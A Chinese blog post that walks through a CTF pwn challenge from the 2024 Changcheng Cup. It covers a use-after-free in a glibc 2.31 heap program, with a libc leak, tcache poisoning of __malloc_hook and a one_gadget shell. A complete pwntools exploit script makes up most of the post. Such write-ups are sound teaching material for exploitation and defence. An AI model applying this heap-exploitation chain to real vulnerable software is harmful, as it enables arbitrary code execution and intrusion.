【PWN · tcache | UAF】[2024 · 长城杯] KyLinHeap

于 2024-09-10 16:14:31 发布
阅读量267 收藏 3
点赞数 4
分类专栏: 【PWN · Heap】 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/142101492
版权

一篇简单的Tachebin Attack

前言

关注glibc版本,审出UAF,即可利用tcachebin attack打__malloc_hook的ogg

一、题目

给了glibc版本,为2.31,这时候的tcache只有number的限制,指针还未做异或,利用比较简单

delete函数中free后没有指针置零,存在UAF

二、解题

思路比较清晰:存在UAF,可以unsortedbin attack来leak libc,也可以进行tcachebin attack修改__malloc_hook为one_gadget

申请一块大堆块,释放到unsortedbin

利用show函数泄露libc

确定合法fake chunk位置

edit修改tache chunk的fd指针,打tcachebin attach

 申请到fake chunk,往__malloc_hook写one_gadget

malloc触发one_gadget

三、EXP

from pwn import *
elf=ELF('./Heap')
libc=ELF('./libc-2.31-0kylin9.2k0.2.so')
context.arch=elf.arch
context.log_level='debug'
io=process('./Heap')
def add(size,content):
    io.sendlineafter(b'What will you do, adventurer? ',b'1')
    io.sendlineafter(b'bytes): ',str(size).encode())
    io.sendafter(b'bytes):\n',content)
    io.recvuntil(b'task.\n')

def delete(idx):
    io.sendlineafter(b'What will you do, adventurer? ',b'2')
    io.sendlineafter(b'): ',str(idx).encode())
    io.recvuntil(b'forever.\n')

def edit(idx,content):
    io.sendlineafter(b'What will you do, adventurer? ',b'3')
    io.sendlineafter(b'): ',str(idx).encode())
    io.sendlineafter(b'):\n',content)

def show(idx):
    io.sendlineafter(b'What will you do, adventurer? ',b'4')
    io.sendlineafter(b'): ',str(idx).encode())
    
def delete_all():
    io.sendlineafter(b'What will you do, adventurer? ',b'5')

gdb.attach(io);input()
add(0x500,b'aaaa') #0 
add(0x10,b'bbbb')  #1
delete(0)
pause()
show(0)
io.recvuntil(b'block [0]:\n')
libc_base=u64(io.recvuntil(b'\n',drop=True).ljust(8,b'\x00'))-0x7a3953716be0+0x7a395352b000
success(hex(libc_base))
pause()
# Fake chunk | IS_MMAPED
# Addr: 0x7a3953716b3d
# prev_size: 0x3953717f60000000
# size: 0x78 (with flag bits: 0x7a)
# fd: 0x00
# bk: 0x00
# fd_nextsize: 0x39535c8570000000
# bk_nextsize: 0x39535c8bf000007a

target=0x7a3953716b3d-0x7a395352b000+libc_base
add(0x60,b'cccc') #2
add(0x60,b'dddd') #3

delete(3)
delete(2)
pause()
edit(2,p64(target))         
pause()
add(0x60,b'eeee')

# 0xe6c7e execve("/bin/sh", r15, r12)
# constraints:
#   [r15] == NULL || r15 == NULL || r15 is a valid argv
#   [r12] == NULL || r12 == NULL || r12 is a valid envp

# 0xe6c81 execve("/bin/sh", r15, rdx)
# constraints:
#   [r15] == NULL || r15 == NULL || r15 is a valid argv
#   [rdx] == NULL || rdx == NULL || rdx is a valid envp

# 0xe6c84 execve("/bin/sh", rsi, rdx)
# constraints:
#   [rsi] == NULL || rsi == NULL || rsi is a valid argv
#   [rdx] == NULL || rdx == NULL || rdx is a valid envp

add(0x60,b'\x00'*0x33+p64(libc_base+0xe6c81))
pause()
io.sendlineafter(b'What will you do, adventurer? ',b'1')
io.sendlineafter(b'bytes): ',str(0x20).encode())
io.interactive()
Mr_Fmnwon
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
长城杯2021 pwn
清霂的博客
09-20 824
长城杯20211.K1ng_in_h3Ap_I2.K1ng_in_h3Ap_II 菜鸡第一次在国内比赛做出两道题,害,长城杯比第五空间温柔多了,第五空间一道rop,之后就直接vm,musl都没学过,还有个c++逆向8出来。打完国赛(写了一道简单堆题,orw调一晚上没出来,服了)之后划水时间太长了,8月下旬才开始继续学堆,争取10月底前把vm,musl,mips,arm这种其他架构(不知道算不算)的pwn学习一下。 1.K1ng_in_h3Ap_I 题目给了3个字节libc地址,操作性还是挺强的,借用残留指针
kernel pwn-kernel UAF
qq_46441427的博客
10-24 2223
不同于用户态pwn,内核pwn就不是用python远程拿shell,而是给一个环境包,下载qemu本地起系统。给定以下文件 boot.sh: 一个用于启动 kernel 的 shell 的脚本,多用 qemu,保护措施与 qemu 不同的启动参数有关 bzImage: kernel binary rootfs.cpio: 文件系统映像 ...
PWN · TcachebinAttack | UAF】[2024CISCN · 华中赛区] note
Mr_Fmnwon的博客
06-26 271
一道简单的tcache劫持。
PWN · UAF】[NISACTF 2022]UAF
Mr_Fmnwon的博客
07-22 972
作为本萌新做的第一道堆题,接触到新的领域,总是又能够学到很多东西。本题用到了堆漏洞UAF:use after free。UAF的第一题,Heap的第一题。heap一直都是pwn里的大头,好好学!加油!
linux kernel pwn学习之UAF
seaaseesa的博客
02-29 1355
Linux Kernel UAF 与用户态下的glibc差不多,都是对已经释放的空间未申请就直接使用,内核的UAF往往是出现在多线程多进程多文件的情况下。即,假如某个用户程序对用一个内核驱动文件打开了两次,有两个文件描述符,它们都指向了该驱动,又因为是在同一个程序里,所以当我们释放掉其中一个文件描述符后,还可以使用另一个文件描述符来操控驱动。 为了加深理解,我们就以一题为例 ciscn201...
2024春秋杯网络安全联赛夏季赛-PWN
llovewuzhengzi的博客
07-10 1180
gadget不够,用csu里的,通过rop的一个特殊gadget修改got表,然后利用gadget满足onegadget的条件,最后调用覆盖got表。没有时间限制,也没有次数限制,可以爆破,26*7次,然后触发格式化字符串泄露canary和libc地址,然后溢出rop绕过沙箱。然后写入shellcode即可(没有栈,通过mmap分配的内容作为栈,进而存储字符串和iovec这个结构体)函数在 Linux 和类 Unix 系统中用于从文件描述符指定的文件中读取数据,但与普通的。如果读取失败,函数将返回。
PWN知识点整理(2)UAF
qq_52469954的博客
10-28 280
UAF全称use after,其内容如名称,在free后再进行利用,UAF是堆结构漏洞的重要利用方式。
PWN · heap | UAF】[HNCTF 2022 WEEK4]ez_uaf
Mr_Fmnwon的博客
03-02 763
UAF释放后重用,常见于free指针后指针未置Nullptr。这就导致了原本的功能块还可以使用,而新分配的功能块又附加了额外的功能。利用就在此产生。强烈建议手动画图!以至于第一次在大致写完遇到bug后,甚至仅通过画图审计代码来修改逻辑上的问题,成功实现利用!这说明利用思路是如此清晰。
PWN】Fastbin 与 Tcache 的利用
u014377094的博客
05-03 1125
从本周开始,针对ctfwiki的顺序,整理堆的攻击方式,顺便练一下手。克服惰性与抗拒,才能继续进步。 首先是为何把fastbin和tcache放第一个整理,因为fastbin和tcache是所有后续攻击的基础,为了实现写入“任意”地址,通常情况下都是利用fastbin和tcache,有个明显的原因就是fastbin和tcache都采用单链表结构,结构更加简单,简单也意味着缺少复杂的检测,更加利于我们去利用。其次,为何把它俩放一起,原因还是两者的结构相似,地位相近,但细节上有不同,放在一起对比利用。 再说
【CTF】【PWN】【UAF】【萌新友好向wp】hitcontraining_uaf
m0_50819561的博客
10-08 391
这题的反编译有点阴间。 这是add函数,add一次会malloc两个chunk。 同时要注意,这里的notelist是一个二维数组。notelist[i]表示的其实是notelist[i][0].后面还有一个notelist[i][1]。 我们看notelist[i],他被赋值为print_note_content这个地址的函数。 notelist[i][1]才是真正存放chunk的content的地方。 为什么要把notelist[i]赋值为print_note_content这个地址的函数呢? 下面这
pwn入门08---堆利用之uaf
weixin_45943522的博客
02-21 1500
use_after_free 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使
星盟-pwn-heap2 (tcache attack,house of orange)
qq_65147345的博客
08-08 1263
通过unsorted-bin泄露出libc_base 通过tcache attack申请到malloc_hook的地址 改写为one_gadget
python】—— Python爬虫实战:爬取珠海市2011-2023年天气数据并保存为CSV文件
weixin_63106307的博客
09-05 978
本文将介绍如何使用Python编写一个简单的爬虫程序,以爬取珠海市2011年至2023年的天气数据,并将这些数据保存为CSV文件。
[Python]生成器和yield关键字
weixin_57336987的博客
09-07 364
概述:​ 它指的是 generator, 类似于以前学过的: 列表推导式, 集合推导式, 字典推导式…作用:​ 降低资源消耗, 快速(批量)生成数据.实现方式:​ 1.推导式写法.​ 2.yield写法.yield i # yield会记录每个生成的数据, 然后逐个的放到生成器对象中, 最终返回生成器对象.问题: 如何从生成器对象中获取数据?​ 答案:​ 1.for循环遍历​ 2.next()函数, 逐个获取.
基于人工智能的音乐情感分类系统
stm32d1219的博客
09-06 888
音乐作为一种强烈的情感表达方式,不同的音调、节奏和和声传递着不同的情感信息。通过人工智能技术,能够自动识别音乐中的情感,为用户提供个性化的音乐推荐或情感分析服务。通过使用MFCC特征提取与神经网络分类算法,音乐情感分类系统可以有效地分析音乐中的情感信息,并根据不同情感对音乐进行分类。随着深度学习技术的进一步发展,音乐情感分类系统的准确性和应用范围将得到进一步提升。音乐情感分类是通过对音乐音频信号进行分析,识别出音乐传递的情感,如“愉快”、“悲伤”、“愤怒”等。问题讨论,人工智能的资料领取可以私信!
数模原理精解【8】
最新发布
基础数学与物理学
09-10 718
假设有一个nnn维随机向量XX1X2XnTXX1​X2​Xn​T,它服从均值为μμ1μ2μnTμμ1​μ2​μn​T和协方差矩阵为ΣΣfXx12πn2∣Σ∣12exp⁡−12x−μTΣ−1x−μfX​x2πn/2∣Σ∣1/21​exp−21​x−μTΣ−1x−μxx1x2xnTxx1​x。
程序的格式框架与缩进
qq_57335683的博客
09-08 333
在上一课时中,我们介绍了 Python 的基本概念,并成功运行了第一个 Python 程序。本课时将深入探讨 Python 程序的基本结构、缩进的重要性,以及如何正确使用注释。通过本课时的学习,你将更好地理解 Python 代码的组织方式,并能够避免一些常见的编程错误。通过本课时的学习,你了解了 Python 程序的基本结构,认识到缩进在 Python 中的重要性,并学会了如何避免常见的缩进错误。缩进不仅是 Python 代码风格的一部分,而且是语法的一部分。这意味着如果缩进不正确,程序将无法正常运行。
访问数组索引时超出边界引发 ArrayIndexOutOfBoundsException
Itmastergo的博客
09-05 1115
在 Java 中,数组是一种数据结构,用于存储固定数量的同类型元素。数组中的元素可以是基本数据类型(如intcharfloat等)或引用类型(如String、自定义类等)。数组是一种线性表数据结构,也就是说,数组中的元素可以通过一个整数索引来访问。数组的索引从0开始,这意味着对于长度为n的数组,合法的索引范围是从0到n-1。// 创建一个长度为 5 的整型数组在上面的例子中,numbers是一个包含 5 个整型元素的数组,索引从0到4。数组的大小在创建时就已经固定,因此无法动态扩展。
uaf pwn hacknote
09-26
根据提供的引用内容,hacknote程序存在Use After Free(UAF)漏洞。UAF是一种内存安全漏洞,它发生在程序试图使用已经被释放的内存区域时。在hacknote程序中,delete_note函数中释放了note对象的内存,但没有将对应的指针设置为NULL。这就导致在之后的操作中,如果再次访问已释放的内存,就会发生UAF漏洞。 攻击者可以利用UAF漏洞来实现攻击,例如修改已经被释放的内存中的内容,控制程序的执行流程,实现任意代码执行、信息泄露等攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值